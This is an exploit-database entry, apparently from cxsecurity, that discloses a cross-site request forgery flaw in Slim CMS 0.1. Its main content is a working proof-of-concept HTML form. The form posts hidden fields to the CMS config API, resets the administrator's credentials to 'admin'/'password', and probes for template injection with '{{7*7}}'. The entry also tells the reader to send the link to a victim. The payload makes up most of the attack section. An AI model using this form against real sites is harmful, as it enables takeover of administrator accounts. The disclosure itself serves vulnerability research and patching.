Slim CMS 0.1 Cross Site Request Forgery

2016.06.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- # Exploit Title: CSRF Vulnerability on Slim CMS v0.1 # CMS Link: https://github.com/revuls/SlimCMS/releases # Date: 16th June'2016 # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://www.slimcms.nl/ # Software Link: https://github.com/revuls/SlimCMS/releases # Version: Slim CMSv0.1 # Tested on: Windows 10, XAMPP # Twitter: https://twitter.com/m_avinash143 CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. Vulnerability Description : It is possible to change the password of the administrator and complete account can be take over using this. Steps to Reproduce the same 1. Login into the account. 2. Navigate to http://localhost/SlimCMS/admin/config 3. Fill the details and intecept the request using BurpSuite Request Intercepted ------------------- --> <html> <body> <form action="http://localhost/SlimCMS/api/config" method="POST"> <input type="hidden" name="title" value="&#123;&#123;7&#42;7&#125;&#125;" /> <input type="hidden" name="description" value="&#123;&#123;7&#42;7&#125;&#125;" /> <input type="hidden" name="user" value="admin" /> <input type="hidden" name="password" value="password" /> <input type="hidden" name="theme" value="default" /> <input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- 4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL). -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top